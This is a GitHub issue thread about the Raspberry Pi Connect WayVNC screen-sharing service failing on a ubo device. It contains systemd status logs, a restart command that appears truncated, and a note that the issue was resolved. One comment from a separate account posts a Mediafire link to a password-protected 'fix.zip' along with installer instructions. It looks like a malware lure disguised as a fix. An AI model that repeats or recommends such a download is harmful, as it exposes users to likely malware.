ubopod/ubo_app #170: RPi Connect screen sharing not always availble

mehrdadfeller, 2024-08-28:
Once in a while RPi connect shows screen sharing as unavailable, and remote desktop stops working. I investigated the issue and seems like `rpi-connect-wayvnc.service` had failed. I guess the service won't attempt to auto-restart if it fails for whatever reason (stopping and starting rpi-connect also did not seem to restart this service.). The issue was fixed after I manually started `rpi-connect-wayvnc.service`.

I suggest we check for this service status when user presses start on the keypad and also attempt to start/restart this service.

```sh
○ rpi-connect-wayvnc.service - WayVNC process used by Raspberry Pi Connect
     Loaded: loaded (/usr/lib/systemd/user/rpi-connect-wayvnc.service; enabled; preset: enabled)
     Active: inactive (dead) since Wed 2024-08-28 04:38:57 BST; 1h 0min ago
   Duration: 20h 20min 56.775s
    Process: 1350 ExecStartPre=/usr/bin/test -S /run/user/1001/wayland-0 -o -S /run/user/1001/wayland-1 (code=exited, status=0/SUCCESS)
    Process: 1353 ExecStart=/usr/bin/rpi-connect-env /usr/bin/wayvnc --config /etc/rpi-connect/wayvnc.config --render-cursor --unix-socket --socket=/run/u>
    Process: 2752 ExecStop=/usr/bin/wayvncctl --socket=/run/user/1001/rpi-connect-wayvnc-ctl.sock wayvnc-exit (code=exited, status=0/SUCCESS)
    Process: 2753 ExecStopPost=/usr/bin/rm -f /run/user/1001/rpi-connect-wayvnc-ctl.sock /run/user/1001/rpi-connect-wayvnc.sock (code=exited, status=0/SUC>
   Main PID: 1353 (code=killed, signal=TERM)
        CPU: 113ms

Aug 27 08:18:00 ubo-k7 systemd[916]: Starting rpi-connect-wayvnc.service - WayVNC process used by Raspberry Pi Connect...
Aug 27 08:18:00 ubo-k7 systemd[916]: Started rpi-connect-wayvnc.service - WayVNC process used by Raspberry Pi Connect.
Aug 28 04:38:57 ubo-k7 systemd[916]: Stopping rpi-connect-wayvnc.service - WayVNC process used by Raspberry Pi Connect...
Aug 28 04:38:57 ubo-k7 rpi-connect-wayvnc[1353]: Warning: ../src/main.c: 716: Shutting down via control socket command
Aug 28 04:38:57 ubo-k7 systemd[916]: Stopped rpi-connect-wayvnc.service - WayVNC process used by Raspberry Pi Connect.
```

This fixed the issue.

```
systemctl --user start c
```

mehrdadfeller, 2024-08-28:
There is a more in-depth discussion on their forum:

 https://forums.raspberrypi.com/viewtopic.php?t=372900

sammykumar108, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

mehrdadfeller, 2024-09-23:
this issue is now resolved

closed 2024-09-23 by mehrdadfeller